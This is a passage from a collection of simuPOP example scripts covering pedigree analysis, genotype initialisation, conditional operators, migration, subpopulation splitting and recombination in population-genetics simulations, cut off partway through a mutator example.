[ped.indByID(x).mother_id for x in children if x >= 1]\ngrandChildren = [ped.indByID(grandFather).info(x) for x in grandOffFields]\ngrandChildrenParents = [ped.indByID(x).father_id for x in grandChildren if x >= 1] \\\n + [ped.indByID(x).mother_id for x in grandChildren if x >= 1]\n\ndef idString(IDs):\n uniqueIDs = list(set(IDs))\n uniqueIDs.sort()\n return ', '.join(['%d' % x for x in uniqueIDs if x >= 1])\n\nprint('''GrandParents: %d, %d\nChildren: %s\nSpouses of children: %s\nParents of children: %s\nGrandChildren: %s\nParents of grandChildren: %s ''' % \\\n(grandFather, grandMother, idString(children), idString(childrenSpouse),\n idString(childrenParents), idString(grandChildren), idString(grandChildrenParents)))\n\n# let us look at the structure of this complete pedigree using another method\nfamSz = ped.identifyFamilies()\n# it is amazing that there is a huge family that connects almost everyone\nlen(famSz), max(famSz)\n# if we only look at the last two generations, things are much better\nped.addInfoFields('ped_id')\nfamSz = ped.identifyFamilies(pedField='ped_id', ancGens=[0,1])\nlen(famSz), max(famSz)\n#end_file\n\n\n\n#begin_file log/locateFamilies.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, ancGen=-1, infoFields=['ind_id', 'father_id', 'mother_id'])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n ],\n matingScheme=sim.RandomMating(\n numOffspring=(sim.UNIFORM_DISTRIBUTION, 2, 4),\n ops=[\n 
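# IdTagger assigns a unique ind_id to each offspring and PedigreeTagger\n # records the parental ind_ids in father_id/mother_id, keeping a full pedigree\n 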
sim.MendelianGenoTransmitter(),\n sim.IdTagger(),\n sim.PedigreeTagger()\n ],\n ),\n gen = 19\n)\n# we now have the complete pedigree of 20 generations\npop.asPedigree()\n# total number of individuals should be 20 * 1000\n# how many families do we have?\nfam = pop.identifyFamilies()\nlen(fam)\n# but how many families with more than 1 individual?\n# The rest of them must be in the initial generation\nlen([x for x in fam if x > 1])\n# let us look backward. allAnc are the ancestors who have offspring in the\n# last generation. You can see this is a small number compared to the number of\n# ancestors.\nallAnc = pop.identifyAncestors()\nlen(allAnc)\n#end_file\n\n\n#begin_file log/saveLoadPedigree.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(4, loci=1, infoFields=['ind_id', 'father_id', 'mother_id'],\n ancGen=-1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.PedigreeTagger(output='>>pedigree.ped', outputLoci=0)\n ],\n matingScheme=sim.RandomMating(\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.IdTagger(),\n sim.PedigreeTagger(output='>>pedigree.ped', outputLoci=0)\n ],\n ),\n gen = 2\n)\n#\nprint(open('pedigree.ped').read())\npop.asPedigree()\npop.save('pedigree1.ped', loci=0)\nprint(open('pedigree1.ped').read())\n# \nped = sim.loadPedigree('pedigree1.ped')\nsim.dump(ped, ancGens=range(3))\n#begin_ignore\nimport os\nos.remove('pedigree.ped')\nos.remove('pedigree1.ped')\n#end_ignore\n#end_file\n\n\n\n#begin_file log/InitSex.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000, 1000])\nsim.initSex(pop, maleFreq=0.3, subPops=0)\nsim.initSex(pop, sex=[sim.MALE, sim.FEMALE, sim.FEMALE], subPops=1)\nsim.stat(pop, numOfMales=True, vars='numOfMales_sp')\nprint(pop.dvars(0).numOfMales)\nprint(pop.dvars(1).numOfMales)\n#end_file\n\n#begin_file log/InitGenotype.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000, 3000], loci=[5, 7])\n# by allele frequency\ndef printFreq(pop, loci):\n sim.stat(pop, alleleFreq=loci)\n print(', '.join(['{:.3f}'.format(pop.dvars().alleleFreq[x][0]) for x in loci]))\n\nsim.initGenotype(pop, freq=[.4, .6])\nsim.dump(pop, max=6, structure=False)\nprintFreq(pop, range(5))\n# by proportion\nsim.initGenotype(pop, prop=[0.4, 0.6])\nprintFreq(pop, range(5))\n# by haplotype frequency\nsim.initGenotype(pop, freq=[.4, .6], haplotypes=[[1, 1, 0, 1], [0, 0, 1]])\nsim.dump(pop, max=6, structure=False)\nprintFreq(pop, range(5))\n# by haplotype proportion\nsim.initGenotype(pop, prop=[0.4, 0.6], haplotypes=[[1, 1, 0], [0, 0, 1, 1]])\nprintFreq(pop, range(5))\n# by genotype\npop = sim.Population(size=[2, 3], loci=[5, 7])\nsim.initGenotype(pop, genotype=[1]*5 + [2]*7 + [3]*5 +[4]*7)\nsim.dump(pop, structure=False)\n# \n# use virtual subpopulation\npop = sim.Population(size=[2000, 3000], loci=[5, 7])\npop.setVirtualSplitter(sim.SexSplitter())\nsim.initSex(pop)\nsim.initGenotype(pop, genotype=range(10), loci=range(5))\n# initialize all males\nsim.initGenotype(pop, genotype=[2]*7, loci=range(5, 12),\n subPops=[(0, 0), (1, 0)])\n# assign genotype by proportions\npop.setVirtualSplitter(sim.ProportionSplitter([0.4, 0.6]))\nsim.initGenotype(pop, freq=[0.2, 0.8], 
subPops=[(0,0)])\nsim.initGenotype(pop, freq=[0.5, 0.5], subPops=[(0,1)])\n#\n# initialize by random allele frequency\nimport random\nsim.initGenotype(pop, freq=lambda : random.random())\nprintFreq(pop, range(5))\n# initialize with loci specific frequency. here\n# lambda loc: 0.01*loc is equivalent to \n# lambda loc: [0.01*loc, 1-0.01*loc]\nsim.initGenotype(pop,\n freq=lambda loc: 0.01*loc)\nprintFreq(pop, range(5))\n# initialize with VSP-specific frequency\nsim.initGenotype(pop,\n freq=lambda vsp: [[0.2, 0.8], [0.5, 0.5]][vsp[1]],\n subPops=[(0, 0), (0, 1)])\n\n#end_file\n\n#begin_file log/InitInfo.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=[5], loci=[2], infoFields=['sex', 'age'])\npop.setVirtualSplitter(sim.SexSplitter())\nsim.initSex(pop)\nsim.initInfo(pop, 0, subPops=[(0,0)], infoFields='sex')\nsim.initInfo(pop, 1, subPops=[(0,1)], infoFields='sex')\nsim.initInfo(pop, lambda: random.randint(20, 70), infoFields='age')\nsim.dump(pop, structure=False)\n#end_file\n\n#begin_file log/Dumper.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[10, 10], loci=[20, 30], infoFields='gen',\n ancGen=-1)\nsim.initSex(pop)\npop.setVirtualSplitter(sim.SexSplitter())\npop1 = pop.clone()\nsim.initGenotype(pop, freq=[0]*20 + [0.1]*10)\npop.setIndInfo(1, 'gen')\nsim.initGenotype(pop1, freq=[0]*50 + [0.1]*10)\npop1.setIndInfo(2, 'gen')\npop.push(pop1)\nsim.dump(pop, width=3, loci=[5, 6, 30], subPops=([0, 0], [1, 1]),\n max=10, structure=False)\n# list all male individuals in all subpopulations\nsim.dump(pop, width=3, loci=[5, 6, 30], subPops=[(sim.ALL_AVAIL, 0)],\n max=10, structure=False)\n#end_file\n\n#begin_file log/SavePopulation.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(100, loci=2),\n rep=5)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2, 0.8])\n ],\n matingScheme=sim.RandomMating(),\n postOps=sim.SavePopulation(output=\"!'snapshot_%d_%d.pop' % (rep, gen)\",\n step = 10),\n gen = 50\n)\n#begin_ignore\nimport os\nfor rep in range(5):\n for gen in range(0, 50, 10):\n os.remove('snapshot_%d_%d.pop' % (rep, gen))\n\n#end_ignore\n#end_file\n\n\n#begin_file log/IfElseFixed.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=1000, loci=1)\nverbose = True\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n matingScheme=sim.RandomMating(),\n postOps=sim.IfElse(verbose,\n ifOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r\"'Gen: %3d, allele freq: %.3f\\n' % (gen, alleleFreq[0][1])\",\n step=5)\n ],\n begin=10),\n gen = 30\n)\n#end_file\n\n\n#begin_file log/IfElse.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(\n sim.Population(size=1000, loci=1),\n rep=4)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n sim.PyExec('below40, above60 = 0, 0')\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n 
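# expressions are evaluated in each replicate's own variable namespace, so\n # below40, above60 and stoppedAt are tracked separately for every population\n 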
sim.IfElse('alleleFreq[0][1] < 0.4',\n sim.PyExec('below40 += 1')),\n sim.IfElse('alleleFreq[0][1] > 0.6',\n sim.PyExec('above60 += 1')),\n sim.IfElse('len(alleleFreq[0]) == 1',\n sim.PyExec('stoppedAt = gen')),\n sim.TerminateIf('len(alleleFreq[0]) == 1')\n ]\n)\nfor pop in simu.populations():\n print('Overall: %4d, below 40%%: %4d, above 60%%: %4d' % \\\n (pop.dvars().stoppedAt, pop.dvars().below40, pop.dvars().above60))\n\n#end_file\n\n#begin_file log/TerminateIf.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(\n sim.Population(size=100, loci=1),\n rep=10)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.TerminateIf('len(alleleFreq[0]) == 1', stopAll=True)\n ]\n)\n\n#end_file\n\n\n#begin_file log/RevertToSaved.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=1234)\n#end_ignore\n\npop = sim.Population(1000, loci=1)\nevolved = pop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n sim.SavePopulation('init.pop', at=4),\n sim.RevertIf('alleleFreq[0][1] == 0', \"init.pop\", begin=5),\n sim.PointMutator(at=4, inds=0, allele=1, loci=0),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r\"'%d %.4f\\n' % (gen, alleleFreq[0][1])\"),\n ],\n gen=20\n)\nprint('Evolved {} generations'.format(evolved))\n#end_file\n\n\n#begin_file log/DiscardIf.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=500, loci=1)\npop.setVirtualSplitter(sim.ProductSplitter([\n sim.AffectionSplitter(),\n sim.RangeSplitter([[0,500], [500, 1000]]),\n ])\n)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5]),\n ],\n matingScheme=sim.RandomMating(\n ops=[\n sim.MendelianGenoTransmitter(),\n sim.MaPenetrance(loci=0, penetrance=[0, 0.01, 0.1]),\n sim.DiscardIf(True, subPops=[\n (0, 'Unaffected, Range [0, 500)'),\n (0, 'Affected, Range [500, 1000)')])\n ],\n subPopSize=1000,\n ),\n gen = 1\n)\nsim.stat(pop, numOfAffected=True)\nprint(pop.dvars().numOfAffected, pop.dvars().numOfUnaffected)\n#end_file\n\n\n\n#begin_file log/Pause.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(100), rep=10)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[sim.Pause(stopOnKeyStroke=str(x), reps=x) for x in range(10)],\n gen = 100\n)\n#end_file\n\n#begin_file log/TicToc.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(10000, loci=[100]*5), rep=2)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.1, 0.9])\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.TicToc(step=50, reps=-1),\n ],\n gen = 101\n)\n#end_file\n\n#begin_file log/PyExec.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(100, 
loci=1),\n rep=2)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.2, 0.8]),\n sim.PyExec('traj=[]')\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyExec('traj.append(alleleFreq[0][1])'),\n ],\n gen=5\n)\n# print Trajectory\nprint(', '.join(['%.3f' % x for x in simu.dvars(0).traj]))\n#end_file\n\n#begin_file log/PyEval.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=1,\n infoFields=['mother_idx', 'father_idx'])\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.ParentsTagger(),\n ]),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r'\"gen %d, #father %d, #mother %d\\n\"' \\\n ' % (gen, numFather, numMother)',\n stmts=\"numFather = len(set(pop.indInfo('father_idx')))\\n\"\n \"numMother = len(set(pop.indInfo('mother_idx')))\",\n exposePop='pop')\n ],\n gen=3\n)\n#end_file\n\n#begin_file log/InfoEval.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(20, loci=1, infoFields='a')\npop.setVirtualSplitter(sim.InfoSplitter('a', cutoff=[3]))\nsim.initGenotype(pop, freq=[0.2, 0.8])\npop.setIndInfo([random.randint(2, 5) for x in range(20)], 'a')\nsim.infoEval(pop, 'a', subPops=[(0, 0)]);print(' ')\nsim.infoEval(pop, 'ind.allele(0, 0)', exposeInd='ind');print(' ')\n# use sim.population variables\npop.dvars().b = 5\nsim.infoEval(pop, '\"%d \" % (a+b)');print(' ')\n#end_file\n\n#begin_file log/InfoExec.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=1, infoFields=['a', 'b', 'c'])\nsim.initSex(pop)\nsim.initGenotype(pop, freq=[0.2, 0.8])\nsim.infoExec(pop, 'a=1')\nprint(pop.indInfo('a')[:10])\nsim.infoExec(pop, 'b=ind.sex()', exposeInd='ind')\nprint(pop.indInfo('b')[:10])\nsim.infoExec(pop, 'c=a+b')\nprint(pop.indInfo('c')[:10])\npop.dvars().d = 5\nsim.infoExec(pop, 'c+=d')\nprint(pop.indInfo('c')[:10])\n# the operator can update population variable as well\nsim.infoExec(pop, 'd+=c*c')\nprint(pop.dvars().d)\n#end_file\n\n#begin_file log/outputByInterval.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport time\npop = sim.Population(1000, loci=10)\npop.dvars().init_time = time.time()\npop.dvars().last_time = time.time()\nexec('import time', pop.vars(), pop.vars())\npop.evolve(\n initOps=sim.InitSex(),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.IfElse('time.time() - last_time > 5', [\n sim.PyEval(r'\"Gen: %d\\n\" % gen'),\n sim.PyExec('last_time = time.time()')\n ]),\n sim.TerminateIf('time.time() - init_time > 20')\n ]\n)\n \n#end_file\n\n\n#begin_file log/migrateByProb.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000]*3, infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=sim.Migrator(rate=[\n [0, 0.1, 0.1],\n [0, 0, 0.1],\n [0, 0.1, 0]\n ]), \n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval('subPopSize'),\n sim.PyOutput('\\n')\n ],\n gen = 5\n) 
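\n# In the default BY_PROBABILITY mode, rate[i][j] is the probability that an\n# individual in subpopulation i migrates to subpopulation j; the probability of\n# staying is one minus the sum of the corresponding row.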
\n#end_file\n\n#begin_file log/migrateByPropAndCount.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000]*3, infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=sim.Migrator(rate=[[0.1], [0.2]],\n mode=sim.BY_PROPORTION,\n subPops=[1, 2],\n toSubPops=[3]),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval('subPopSize'),\n sim.PyOutput('\\n')\n ],\n gen = 5\n) \n#\npop.evolve(\n preOps=sim.Migrator(rate=[[50, 50], [100, 50]],\n mode=sim.BY_COUNTS,\n subPops=[3, 2],\n toSubPops=[2, 1]),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(popSize=True),\n sim.PyEval('subPopSize'),\n sim.PyOutput('\\n')\n ],\n gen = 5\n) \n#end_file\n\n#begin_file log/migrateVSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000]*2, infoFields='migrate_to')\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n # 500 males and 500 females\n initOps=sim.InitSex(sex=[sim.MALE, sim.FEMALE]),\n preOps=[\n sim.Migrator(rate=[\n [0, 0.10],\n [0, 0.05],\n ],\n mode = sim.BY_PROPORTION,\n subPops=[(0, 0), (0, 1)]),\n sim.Stat(popSize=True, numOfMales=True, vars='numOfMales_sp'),\n sim.PyEval(r\"'%d/%d\\t%d/%d\\n' % (subPop[0]['numOfMales'], subPopSize[0], \"\n \"subPop[1]['numOfMales'], subPopSize[1])\"),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(popSize=True, numOfMales=True, vars='numOfMales_sp'),\n sim.PyEval(r\"'%d/%d\\t%d/%d\\n' % (subPop[0]['numOfMales'], subPopSize[0], \"\n \"subPop[1]['numOfMales'], subPopSize[1])\"),\n ],\n gen = 2\n) \n#end_file\n\n#begin_file log/manualMigration.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([10]*2, infoFields='migrate_to')\npop.setIndInfo([0, 1, 2, 3]*5, 'migrate_to')\nsim.migrate(pop, mode=sim.BY_IND_INFO)\npop.subPopSizes()\n#end_file\n\n#begin_file log/splitBySize.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000)\npop.evolve(\n preOps=[\n sim.SplitSubPops(subPops=0, sizes=[300, 300, 400], at=2),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s\\n\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomSelection(),\n gen = 4\n)\n#end_file\n\n#begin_file log/splitByProp.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\ndef demo(gen, pop):\n if gen < 2:\n return 1000 + 100 * gen\n else:\n return [x + 50 * gen for x in pop.subPopSizes()]\n\npop = sim.Population(1000)\npop.evolve(\n preOps=[\n sim.SplitSubPops(subPops=0, proportions=[.5]*2, at=2),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s\\n\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomSelection(subPopSize=demo),\n gen = 4\n)\n#end_file\n\n\n\n#begin_file log/backwardMigrate.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsim.turnOnDebug('DBG_MIGRATOR')\npop = sim.Population(size=[10000, 5000, 8000], infoFields=['migrate_to', 'migrate_from'])\ndef originOfInds(pop):\n print('Observed 
backward migration matrix at generation {}'.format(pop.dvars().gen))\n for sp in range(pop.numSubPop()): \n # get source subpop for all individuals in subpopulation i\n origins = pop.indInfo('migrate_from', sp)\n spSize = pop.subPopSize(sp)\n B_sp = [origins.count(j) * 1.0 /spSize for j in range(pop.numSubPop())]\n print(' ' + ', '.join(['{:.3f}'.format(x) for x in B_sp]))\n return True\n\npop.evolve(\n initOps=sim.InitSex(),\n preOps=\n # mark the source subpopulation of each individual\n [sim.InitInfo(i, subPops=i, infoFields='migrate_from') for i in range(3)] + [\n # perform migration\n sim.BackwardMigrator(rate=[\n [0, 0.04, 0.02],\n [0.05, 0, 0.02],\n [0.02, 0.01, 0]\n ]),\n # calculate and print observed backward migration matrix \n sim.PyOperator(func=originOfInds),\n # calculate population size\n sim.Stat(popSize=True),\n # and print it\n sim.PyEval(r'\"Pop size after migration: {}\\n\".format(\", \".join([str(x) for x in subPopSize]))'),\n ], \n matingScheme=sim.RandomMating(),\n gen = 5\n) \n#end_file\n\n\n#begin_file log/splitByInfo.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population([1000]*3, subPopNames=['a', 'b', 'c'], infoFields='x')\npop.setIndInfo([random.randint(0, 3) for x in range(1000)], 'x')\nprint(pop.subPopSizes())\nprint(pop.subPopNames())\nsim.splitSubPops(pop, subPops=[0, 2], infoFields=['x'])\nprint(pop.subPopSizes())\nprint(pop.subPopNames())\n#end_file\n\n#begin_file log/MergeSubPops.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([500]*2)\npop.evolve(\n preOps=[\n sim.MergeSubPops(subPops=[0, 1], at=3),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s\\n\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomSelection(),\n gen = 5\n)\n#end_file\n\n#begin_file log/ResizeSubPops.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([500]*2)\npop.evolve(\n preOps=[\n sim.ResizeSubPops(proportions=(1.5, 2), at=3),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s\\n\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomSelection(),\n gen = 5\n)\n#end_file\n\n\n#begin_file log/VaryingMigr.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\nfrom simuPOP.utils import migrIslandRates\nimport random\n\ndef demo(pop):\n # this function randomly split populations\n numSP = pop.numSubPop()\n if random.random() > 0.3:\n pop.splitSubPop(random.randint(0, numSP-1), [0.5, 0.5])\n return pop.subPopSizes()\n\ndef migr(pop):\n numSP = pop.numSubPop()\n sim.migrate(pop, migrIslandRates(0.01, numSP))\n return True\n\npop = sim.Population(10000, infoFields='migrate_to')\npop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n sim.PyOperator(func=migr),\n sim.Stat(popSize=True),\n sim.PyEval(r'\"Gen %d:\\t%s\\n\" % (gen, subPopSize)')\n ],\n matingScheme=sim.RandomMating(subPopSize=demo),\n gen = 5\n)\n#end_file\n\n\n\n\n#begin_file log/recRate.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(size=[1000], loci=[100]),\n rep=2)\nsimu.evolve(\n 
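# reps=0 and reps=1 restrict each Recombinator to one replicate, so the two\n # replicates evolve under different recombination maps\n 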
initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*100 + [1]*100)\n ],\n matingScheme=sim.RandomMating(ops = [\n sim.Recombinator(rates=0.01, reps=0),\n sim.Recombinator(rates=[0.01]*10, loci=range(50, 60), reps=1),\n ]),\n postOps=[\n sim.Stat(LD=[[40, 55], [60, 70]]),\n sim.PyEval(r'"%d:\\t%.3f\\t%.3f\\t" % (rep, LD_prime[40][55], LD_prime[60][70])'),\n sim.PyOutput('\\n', reps=-1)\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/recIntensity.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[1000], loci=3, lociPos=[0, 1, 1.1])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*3 + [1]*3)\n ],\n matingScheme=sim.RandomMating(ops=sim.Recombinator(intensity=0.01)),\n postOps=[\n sim.Stat(LD=[[0, 1], [1, 2]]),\n sim.PyEval(r'"%.3f\\t%.3f\\n" % (LD_prime[0][1], LD_prime[1][2])', step=10)\n ],\n gen = 50\n)\n#end_file\n\n#begin_file log/conversion.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(size=[1000], loci=[100]),\n rep=2)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[0]*100 + [1]*100)\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.Recombinator(rates=0.01, loci=50, reps=0),\n sim.Recombinator(rates=0.01, loci=50, reps=1, convMode=(sim.NUM_MARKERS, 1, 10)),\n ]),\n postOps=[\n sim.Stat(LD=[[40, 55], [40, 70]]),\n sim.PyEval(r'"%d:\\t%.3f\\t%.3f\\t" % (rep, LD_prime[40][55], LD_prime[40][70])'),\n sim.PyOutput('\\n', reps=-1)\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/trackRec.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[1000, 2000], infoFields='ind_id')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.IdTagger(),\n ],\n matingScheme=sim.RandomMating(ops = [\n sim.IdTagger(),\n sim.Recombinator(rates=0.001, output='>>rec.log', infoFields='ind_id')]),\n gen = 5\n)\nrec = open('rec.log')\n# print the first four lines of the log file\nprint(''.join(rec.readlines()[:4]))\n#begin_ignore\nrec.close()\nimport os\nos.remove('rec.log')\n#end_ignore\n#end_file\n\n#begin_file log/MatrixMutator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2000], loci=1)\npop.evolve(\n initOps=[\n sim.InitSex(),\n 